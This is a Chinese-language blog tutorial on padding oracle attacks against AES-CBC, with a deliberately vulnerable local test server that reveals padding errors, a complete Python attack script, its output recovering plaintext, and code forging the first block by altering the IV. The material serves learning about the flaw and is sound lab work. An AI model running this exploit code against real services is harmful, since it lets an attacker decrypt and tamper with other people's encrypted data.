zoukankan      html  css  js  c++  java
  • AES CBC模式下的Padding Oracle解密

    AES CBC模式下的Padding Oracle解密

    AES CBC模式下的Padding Oracle解密

    1 简介

    Padding Oracle攻击方法出现的也比较早了,参考padding oracle attack,这篇文章写的比较好。 也可以参考ctf-wiki。 Padding Oracle Attack主要是针对CBC分组加密的情况,通过padding来测试每个分组的每个字节是否正确来获取分组的中间状态值,上一个分组XOR中间状态值就是明文。第一个分组使用初始IV来XOR获得明文。

    https://img2018.cnblogs.com/blog/1545892/201906/1545892-20190621172625457-1317081856.jpg

    图1  CBC模式一个分组的解密过程

    2 aes cbc加解密测试程序

    用FLASK实现一个aes cbc加解密的测试程序,代码如下,保存为aes_server.py:

    #!/usr/bin/python
    # coding=utf-8
    # python 3
    # 安装依赖 pip3 install PyCrypto flask
    # 运行 FLASK_APP=aes_server.py  flask run
    
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.parse import urlparse, parse_qs, unquote
    import traceback
    
    import base64
    import hashlib
    from Crypto import Random
    from Crypto.Cipher import AES
    
    # padding 对齐的字节数
    BS = 16
    
    
    def pad(s):
        return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
    
    
    def unpad(s):
        '''检查解密串的padding是否正确,并去掉Padding'''
        pad = s[-1]
        # padding值不对就抛出异常,网上的python实现基本都忽略了padding值检查
        if pad > BS or pad < 1:
            # padding值大于0小于等于最大分组字节数
            raise Exception("padding error.")
        slen = len(s)
        for p in s[slen-pad:slen]:
            # 所有padding值相等
            if p != pad:
                raise Exception("padding value error.")
        print("unpad:", pad)
        return s[0:-pad]
    
    
    class AESCipher:
        """ AES cbc 加解密
        """
    
        def __init__(self, key):
            self.key = key.encode('utf-8')
    
        def encrypt(self, raw):
            raw = pad(raw).encode('utf-8')
            iv = Random.new().read(AES.block_size)
            c = AES.new(self.key, AES.MODE_CBC, iv)
            return str(base64.b64encode(iv + c.encrypt(raw)), 'utf-8')
    
        def decrypt(self, enc):
            enc = base64.b64decode(enc)
            iv = enc[:16]
            c = AES.new(self.key, AES.MODE_CBC, iv)
            deced = unpad(c.decrypt(enc[16:]))
            return deced
    
    
    cipher = AESCipher('1234567890123456')
    # cipher.encrypt('testaa')
    
    form = '''<!DOCTYPE html>
    <title>aes encoder/decoder</title>
    <form method="POST" action="/encode">
    <textarea name="body"></textarea>
    <br>
    <button type="submit">加密</button>
    </form>'''
    
    PORT_NUMBER = 8081
    
    
    def b64_url_dec(s):
        return s.replace('~', '=').replace('!', '/').replace('-', '+')
    
    
    def b64_url_enc(s):
        return s.replace('+', '-').replace('/', '!').replace('=', '~')
    
    
    class myHandler(BaseHTTPRequestHandler):
        # Handler for the GET requests
        def write_out(self, data):
            self.send_response(200)
            self.send_header('Content-type', 'text/html; charset=utf-8')
            self.end_headers()
            self.wfile.write(data)
    
        def do_GET(self):
            if "/decode" in self.path:
                try:
                    # 解密操作
                    query = urlparse(self.path).query
                    print('decode query:', query)
                    query_components = dict(qc.split("=")
                                            for qc in query.split("&"))
                    data = b64_url_dec(unquote(query_components["data"]))
                    deced = cipher.decrypt(data)
                    self.write_out(deced)
                except:
                    self.write_out(traceback.format_exc().encode())
            elif "/check" in self.path:
                try:
                    # 检查是否能正确解密
                    query = urlparse(self.path).query
                    print('check query:', query)
                    query_components = dict(qc.split("=")
                                            for qc in query.split("&"))
                    data = b64_url_dec(unquote(query_components["data"]))
                    deced = cipher.decrypt(data)
                    self.write_out(u'成功通过!'.encode('utf-8'))
                except:
                    self.write_out(traceback.format_exc().encode())
            else:
                self.write_out(form.encode())
    
        def do_POST(self):
            print("post:", self.path)
            if self.path == "/encode":
                # 加密操作
                try:
                    content_len = int(self.headers.get('Content-Length'))
                    post_body = self.rfile.read(content_len)
                    postvars = parse_qs(post_body, keep_blank_values=1)
                    print('post encode vars:', postvars)
                    body = str(postvars[b'body'][0], 'utf-8')
                    enced = cipher.encrypt(body)
                    out = b64_url_enc(enced)
                    self.write_out(out.encode())
                except:
                    self.write_out(traceback.format_exc().encode())
    
    
    try:
        # Create a web server and define the handler to manage the
        # incoming request
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print('Started httpserver on port ', PORT_NUMBER)
        # Wait forever for incoming htto requests
        server.serve_forever()
    
    except KeyboardInterrupt:
        print('^C received, shutting down the web server')
        server.socket.close()
    

    encode用于加密一个字符串,decode解密加密后的字符串,check用于测试加密串是否正确,这里使用check进行Padding Oracle Attack测试,比较接近真实情况。

    启动flask server,通过8081端口访问:

    FLASK_APP=aes_server.py  flask run
    

    使用python测试请求,代码如下:

    # coding=utf-8
    # python 3
    # 安装依赖 pip3 install requests
    
    import requests as req
    
    proxy = 'http://127.0.0.1:8080'
    MY_PROXY = {
        # 本地代理,用于测试,如果不需要代理可以注释掉
        #'http': proxy,
        #'https': proxy,
    }
    
    # server端地址,测试的时候使用windows本机启动FLASK,python代码访问会卡住。
    host = 'http://192.168.47.129:8081'
    
    
    def test_enc(txt):
        '''测试加密'''
        resp = req.post(host + '/encode', data={'body': txt}, proxies=MY_PROXY)
        return resp.text
    
    
    def test_dec(txt):
        '''测试解密'''
        resp = req.get(host + '/decode', params={'data': txt}, proxies=MY_PROXY)
        return resp.text
    
    
    def test_check(txt):
        '''测试检查'''
        resp = req.get(host + '/check', params={'data': txt}, proxies=MY_PROXY)
        return resp.text
    

    测试加密功能:

    print(test_enc('this is a test'))
    

    加密结果如下:

    DAEeUIUbJiXSuxmR8PDlIlOSj5EUKxgueLKy!Wiysd0~
    

    测试解密功能:

    print(test_dec('CLBtfIAQc4PLeB9-6m9XGmtBH34O98vrcw54KPTtx3M~'))
    
    this is a test
    

    解密后的明文padding错误的情况:

    print(test_check('CLBtfIAQc4PAeBA-6m9XGmtAH34O98vrcw54KPTtx3M~'))
    
    Traceback (most recent call last):
      File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 112, in do_GET
        deced = cipher.decrypt(data)
      File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 57, in decrypt
        deced = unpad(c.decrypt(enc[16:]))
      File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 30, in unpad
        raise Exception("padding error.")
    Exception: padding error.
    

    当发送的密文不能解密的时候,会返回padding错误的异常(不一定为异常,只要跟解密成功的结果不同就可以),这样就会造成Padding Oracle攻击。

    3 Padding Oracle Attack过程

    当服务器处理CBC解密时,对于失败和成功返回不同的结果,就能进行Padding Oracle Attack。类似于布尔型SQL注入,针对每个分组的每个字节,输入正确的padding值(相当于明文),修改这个分组的iv,测试并找到返回成功的结果,与padding值XOR就能获得中间状态值(即图中的I2)。

    padding oracle实现代码:

    # coding=utf-8
    # python 3
    # padding oracle 实现代码
    
    from Crypto import Random
    
    
    # 分组最大字节数
    BS = 16
    
    
    def pad(s):
        return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
    
    
    def unpad(s):
        return s[0:-s[-1]]
    
    
    def find_valid_byte(req_fn, find_valid_fn, data, pos, min_req):
        '''找到解密数据指定位置的正确IV字节值
        req_fn 请求解密的函数
        find_valid_fn 找到正确值的函数,参数为测试值和req_fn返回结果组成的map,如{1 : 'resp data'},
                        返回结果为正确的值,没有则需要返回None
        data 要解密的数据
        pos 要查找正确值的位置
        min_req 最小测试次数,请求达到min_req次,就会比较是否找到正确的padding值'''
        data = bytearray(data)
        results = {}
        for i in range(0x100):
            # 检测从0到255的值是否符合padding要求
            data[pos] = i
            results[i] = req_fn(bytes(data))
            if i >= min_req:
                r_data = find_valid_fn(results)
                if r_data:
                    return r_data
        return find_valid_fn(results)
    
    
    def format_padding_iv(iv, pos, value):
        '''格式化padding对应的iv
        pos 指定开始位置
        value 要测试的padding值
        '''
        r = bytearray(iv)
        for idx, val in enumerate(r):
            if idx > pos:
                r[idx] = val ^ value
            else:
                r[idx] = val
        return bytes(r)
    
    
    def padding_oracle_group(req_fn, find_valid_fn, data, orig_iv, i_state=b'', min_req=256):
        ''' 获取一组数据的解密结果和intermiedate state
        req_fn 请求解密的函数
        find_valid_fn 找到正确值的函数,参数为测试值和req_fn返回结果组成的map,如{1 : 'resp data'},
                        返回结果为正确的值,没有则需要返回None
        data 要解密的数据, bytes
        orig_iv 要解密数据的iv, bytes
        i_state 如果指定i_state,则会从没找到的位置继续
        '''
        count = BS - len(i_state)
        iv = bytearray(Random.new().read(count) + i_state)
        r_istate = bytearray(i_state)
        for pos in reversed(range(count)):
            print("pos:%d iv:%s istate:%s" % (pos, iv, r_istate))
            pad_v = BS - pos
            curr_data = format_padding_iv(iv, pos, pad_v) + data
            print('pad_v:', pad_v, ' test data:', curr_data)
            val = find_valid_byte(req_fn, find_valid_fn, curr_data, pos, min_req)
            if val:
                r = val ^ pad_v
                print("find istate %02x at pos:%d" % (r, pos))
                iv[pos] = r
                r_istate.insert(0, r)
            else:
                print("can't find istate at pos:", pos)
                return None, r_istate
        deced_res = bytes(a ^ b for (a, b) in zip(orig_iv, r_istate))
        return deced_res, r_istate
    
    
    def partition_group(data):
        '''data按分组长度进行分组'''
        return [data[i:i+BS] for i in range(0, len(data), BS)]
    
    
    def padding_oracle(req_fn, find_valid_fn, data, min_req=256):
        '''获取一组数据的解密结果和intermiedate state
        req_fn 请求解密的函数
        find_valid_fn 找到正确值的函数,参数为测试值和req_fn返回结果组成的map,如{1 : 'resp data'},
                        返回结果为正确的值,没有则需要返回None
        data 加密数据,注意前面要带上iv
        min_req 最小测试次数,请求达到min_req次,就会测试是否包含有效的padding, 
                   用于加速,如果找到有效padding值,后面就不再调用req_fn了。
                   默认全部请求结束再查找正确的padding值。
        '''
        parts = partition_group(data)
        ivs = parts[:-1]
        datas = parts[1:]
        result = b''
        istates = []
        for group_iv, group_data in zip(ivs, datas):
            group_result, group_istate = padding_oracle_group(
                req_fn, find_valid_fn, group_data, group_iv, min_req=min_req)
            result += group_result
            istates.append(group_istate)
        return result, istates
    

    测试代码:

    import re
    import base64
    
    ############### 编码辅助函数
    def b64_url_dec(s):
        return s.replace('~', '=').replace('!', '/').replace('-', '+')
    
    
    def b64_url_enc(s):
        return s.replace('+', '-').replace('/', '!').replace('=', '~')
    
    
    def bytes_to_str(data):
        return "".join(chr(x) for x in bytearray(data))
    
    
    ############## 解密辅助函数
    def my_dec_req(data):
        '''测试解密,注意这里的data是原始字节'''
        txt = b64_url_enc(bytes_to_str(base64.b64encode(data)))
        return test_check(txt)
    
    
    def my_check_ok(resps):
        '''检测并返回解密成功的值'''
        for value, resp in resps.items():
            if re.match(r'成功', resp):
                return value
        return None
    

    解密测试:

    # 获取一个加密数据
    test1 = test_enc('go gogogogo')
    test_data = base64.b64decode(b64_url_dec(test1))
    
    # 这里使用min_req选项,能显著加快运行速度
    results = padding_oracle(my_dec_req, my_check_ok, test_data, min_req=10)
    print(results)
    
    

    程序运行结果:

    pos:15 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Tx88xc5') istate:bytearray(b'')
    pad_v: 1  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Tx88xc58xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 2b at pos:15
    pos:14 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Tx88+') istate:bytearray(b'+')
    pad_v: 2  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Tx88)8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate cd at pos:14
    pos:13 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Txcd+') istate:bytearray(b'xcd+')
    pad_v: 3  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3Txce(8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 99 at pos:13
    pos:12 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3x99xcd+') istate:bytearray(b'x99xcd+')
    pad_v: 4  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?xc3x9dxc9/8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 42 at pos:12
    pos:11 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?Bx99xcd+') istate:bytearray(b'Bx99xcd+')
    pad_v: 5  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5?Gx9cxc8.8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate f3 at pos:11
    pos:10 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5xf3Bx99xcd+') istate:bytearray(b'xf3Bx99xcd+')
    pad_v: 6  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15xc5xf5Dx9fxcb-8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 6e at pos:10
    pos:9 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wx15nxf3Bx99xcd+') istate:bytearray(b'nxf3Bx99xcd+')
    pad_v: 7  test data: b'xd5xd1xfcxc0=Wxdfxa1Wx15ixf4Ex9exca,8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate e5 at pos:9
    pos:8 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1Wxe5nxf3Bx99xcd+') istate:bytearray(b'xe5nxf3Bx99xcd+')
    pad_v: 8  test data: b'xd5xd1xfcxc0=Wxdfxa1WxedfxfbJx91xc5#8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 7d at pos:8
    pos:7 iv:bytearray(b'xd5xd1xfcxc0=Wxdfxa1}xe5nxf3Bx99xcd+') istate:bytearray(b'}xe5nxf3Bx99xcd+')
    pad_v: 9  test data: b'xd5xd1xfcxc0=Wxdfxa1txecgxfaKx90xc4"8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 6a at pos:7
    pos:6 iv:bytearray(b'xd5xd1xfcxc0=Wxdfj}xe5nxf3Bx99xcd+') istate:bytearray(b'j}xe5nxf3Bx99xcd+')
    pad_v: 10  test data: b'xd5xd1xfcxc0=Wxdf`wxefdxf9Hx93xc7!8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 50 at pos:6
    pos:5 iv:bytearray(b'xd5xd1xfcxc0=WPj}xe5nxf3Bx99xcd+') istate:bytearray(b'Pj}xe5nxf3Bx99xcd+')
    pad_v: 11  test data: b'xd5xd1xfcxc0=W[avxeeexf8Ix92xc6 8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 06 at pos:5
    pos:4 iv:bytearray(b'xd5xd1xfcxc0=x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 12  test data: b"xd5xd1xfcxc0=
    \fqxe9bxffNx95xc1'8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb"
    find istate 04 at pos:4
    pos:3 iv:bytearray(b'xd5xd1xfcxc0x04x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'x04x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 13  test data: b'xd5xd1xfcxc0	x0b]gpxe8cxfeOx94xc0&8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate aa at pos:3
    pos:2 iv:bytearray(b'xd5xd1xfcxaax04x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'xaax04x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 14  test data: b'xd5xd1xfcxa4
    x08^dsxeb`xfdLx97xc3%8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate 94 at pos:2
    pos:1 iv:bytearray(b'xd5xd1x94xaax04x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'x94xaax04x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 15  test data: b'xd5xd1x9bxa5x0b	_erxeaaxfcMx96xc2$8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate fc at pos:1
    pos:0 iv:bytearray(b'xd5xfcx94xaax04x06Pj}xe5nxf3Bx99xcd+') istate:bytearray(b'xfcx94xaax04x06Pj}xe5nxf3Bx99xcd+')
    pad_v: 16  test data: b'xd5xecx84xbax14x16@zmxf5~xe3Rx89xdd;8xdcMx98Sxe6Dxfe[|x93x14$x96x1fxcb'
    find istate df at pos:0
    (b'go gogogogox05x05x05x05x05', [bytearray(b'xdfxfcx94xaax04x06Pj}xe5nxf3Bx99xcd+')])
    

    可以看到通过/check请求,成功解密出明文, 即results[0]。 results[1]是每个数据分组的中间状态,对应图中的INTERMIEDATE STATE

    再进一步,可以通过修改iv实现对第一个加密的分组数据进行修改,例如:

    # 可以实现伪造第一个数据分组的内容,因为iv是可以改变的,
    # 改变原始iv,就相当于改变了第一个数据分组的解密结果。
    def build_fake_first(data, fake_data, data_is):
        ''' data为密文数据
        fake_data 伪造的第一个分组数据
        data_is 解密出的中间状态值'''
        if len(fake_data) > BS:
            raise Exception('fake data too large!')
        new_data = bytearray(data)
        fake_group_data = pad(fake_data)
        for i in range(BS):
            new_data[i] = ord(fake_group_data[i]) ^ data_is[i]
        return new_data
    
    my_fake = build_fake_first(test_data, 'fake data', results[1][0])
    print(test_dec(b64_url_enc(bytes_to_str(base64.b64encode(my_fake)))))
    

    因为这个加密数据只有1个分组,所以整个数据被替换掉了,结果如下:

    fake data
    

    4 总结

    只要明白了分组解密的xor过程和pkcs5/pkcs7的padding填充方式,Padding Oracle利用还是比较简单的。

    作者: ntestoc

    Created: 2019-06-21 周五 17:26

  • 相关阅读:
    URAL 1998 The old Padawan 二分
    URAL 1997 Those are not the droids you're looking for 二分图最大匹配
    URAL 1995 Illegal spices 贪心构造
    URAL 1993 This cheeseburger you don't need 模拟题
    URAL 1992 CVS
    URAL 1991 The battle near the swamp 水题
    Codeforces Beta Round #92 (Div. 1 Only) A. Prime Permutation 暴力
    Codeforces Beta Round #7 D. Palindrome Degree hash
    Codeforces Beta Round #7 C. Line Exgcd
    Codeforces Beta Round #7 B. Memory Manager 模拟题
  • 原文地址:https://www.cnblogs.com/ntestoc/p/11044433.html
Copyright © 2011-2022 走看看